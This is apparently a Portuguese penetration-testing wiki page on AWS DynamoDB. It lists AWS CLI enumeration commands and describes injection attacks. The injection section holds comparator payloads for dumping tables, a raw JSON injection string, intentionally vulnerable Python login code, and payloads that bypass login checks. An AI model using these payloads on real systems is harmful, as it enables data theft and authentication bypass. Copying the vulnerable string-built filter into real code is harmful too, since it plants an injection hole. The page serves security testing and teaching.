AWS - Enumeração do DynamoDB

Reading time: 7 minutes

DynamoDB

Informações Básicas

Amazon DynamoDB é apresentado pela AWS como um banco de dados NoSQL de chave-valor totalmente gerenciado e sem servidor, projetado para alimentar aplicações de alto desempenho, independentemente de seu tamanho. O serviço garante recursos robustos, incluindo medidas de segurança inerentes, backups ininterruptos, replicação automatizada em várias regiões, cache em memória integrado e utilitários convenientes de exportação de dados.

No contexto do DynamoDB, em vez de estabelecer um banco de dados tradicional, tabelas são criadas. Cada tabela exige a especificação de uma chave de partição como um componente integral da chave primária da tabela. Essa chave de partição, essencialmente um valor hash, desempenha um papel crítico tanto na recuperação de itens quanto na distribuição de dados entre vários hosts. Essa distribuição é fundamental para manter tanto a escalabilidade quanto a disponibilidade do banco de dados. Além disso, há a opção de incorporar uma chave de ordenação para refinar ainda mais a organização dos dados.

Criptografia

Por padrão, o DynamoDB usa uma chave KMS que pertence ao Amazon DynamoDB, nem mesmo a chave gerenciada pela AWS que pelo menos pertence à sua conta.

Backups & Exportação para S3

É possível agendar a geração de backups de tabelas ou criá-los sob demanda. Além disso, também é possível habilitar Recuperação em ponto no tempo (PITR) para uma tabela. A recuperação em ponto no tempo fornece backups contínuos dos seus dados do DynamoDB por 35 dias para ajudar a proteger contra operações de escrita ou exclusão acidentais.

Também é possível exportar os dados de uma tabela para o S3, mas a tabela precisa ter PITR habilitado.

GUI

Há uma GUI para serviços locais do Dynamo, como DynamoDB Local, dynalite, localstack, etc, que pode ser útil: https://github.com/aaronshaf/dynamodb-admin

Enumeração

# Tables
aws dynamodb list-tables
aws dynamodb describe-table --table-name <t_name> #Get metadata info
## The primary key and sort key will appear inside the KeySchema field

#Check if point in time recovery is enabled
aws dynamodb describe-continuous-backups \
--table-name tablename

# Backups
aws dynamodb list-backups
aws dynamodb describe-backup --backup-arn <arn>
aws dynamodb describe-continuous-backups --table-name <t_name>

# Global tables
aws dynamodb list-global-tables
aws dynamodb describe-global-table --global-table-name <name>

# Exports
aws dynamodb list-exports
aws dynamodb describe-export --export-arn <arn>

# Misc
aws dynamodb describe-endpoints #Dynamodb endpoints

Acesso Não Autenticado

AWS - DynamoDB Unauthenticated Access

Privesc

AWS - DynamoDB Privesc

Pós Exploração

AWS - DynamoDB Post Exploitation

Persistência

AWS - DynamoDB Persistence

Injeção no DynamoDB

Injeção SQL

Existem maneiras de acessar dados do DynamoDB com sintaxe SQL, portanto, injeções SQL típicas também são possíveis.

SQL Injection - HackTricks

Injeção NoSQL

No DynamoDB, diferentes condições podem ser usadas para recuperar dados, como em uma injeção NoSQL comum. Se for possível encadear mais condições para recuperar dados, você pode obter dados ocultos (ou despejar toda a tabela).
Você pode encontrar aqui as condições suportadas pelo DynamoDB: https://docs.aws.amazon.com/amazondynamodb/latest/APIReference/API_Condition.html

Observe que diferentes condições são suportadas se os dados estiverem sendo acessados via query ou via scan.

Se você puder mudar a comparação realizada ou adicionar novas, poderá recuperar mais dados.

# Comparators to dump the database
"NE": "a123" #Get everything that doesn't equal "a123"
"NOT_CONTAINS": "a123" #What you think
"GT": " " #All strings are greater than a space

NoSQL injection - HackTricks

Injeção de Json Bruto

DynamoDB aceita objetos Json para pesquisar dados dentro do DB. Se você descobrir que pode escrever no objeto json enviado para pesquisa, você pode fazer o dump do DB, todo o conteúdo.

Por exemplo, injetando em uma solicitação como:

'{"Id": {"ComparisonOperator": "EQ","AttributeValueList": [{"N": "' + user_input + '"}]}}'

um atacante poderia injetar algo como:

1000"}],"ComparisonOperator": "GT","AttributeValueList": [{"N": "0

corrija a condição "EQ" buscando o ID 1000 e, em seguida, procurando todos os dados com uma string de Id maior que 0, que é tudo.

Outro exemplo vulnerável usando um login poderia ser:

scan_filter = """{
"username": {
"ComparisonOperator": "EQ",
"AttributeValueList": [{"S": "%s"}]
},
"password": {
"ComparisonOperator": "EQ",
"AttributeValueList": [{"S": "%s"}]
}
}
""" % (user_data['username'], user_data['password'])

dynamodb.scan(TableName="table-name", ScanFilter=json.loads(scan_filter))

Isto seria vulnerável a:

username: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none
password: none"}],"ComparisonOperator": "NE","AttributeValueList": [{"S": "none

:property Injection

Alguns SDKs permitem usar uma string indicando o filtro a ser realizado, como:

new ScanSpec().withProjectionExpression("UserName").withFilterExpression(user_input+" = :username and Password = :password").withValueMap(valueMap)

Você precisa saber que, ao pesquisar no DynamoDB para substituir um valor de atributo em expressões de filtro enquanto escaneia os itens, os tokens devem começar com o caractere :. Esses tokens serão substituídos pelo valor do atributo real em tempo de execução.

Portanto, um login como o anterior pode ser contornado com algo como:

:username = :username or :username
# This will generate the query:
# :username = :username or :username = :username and Password = :password
# which is always true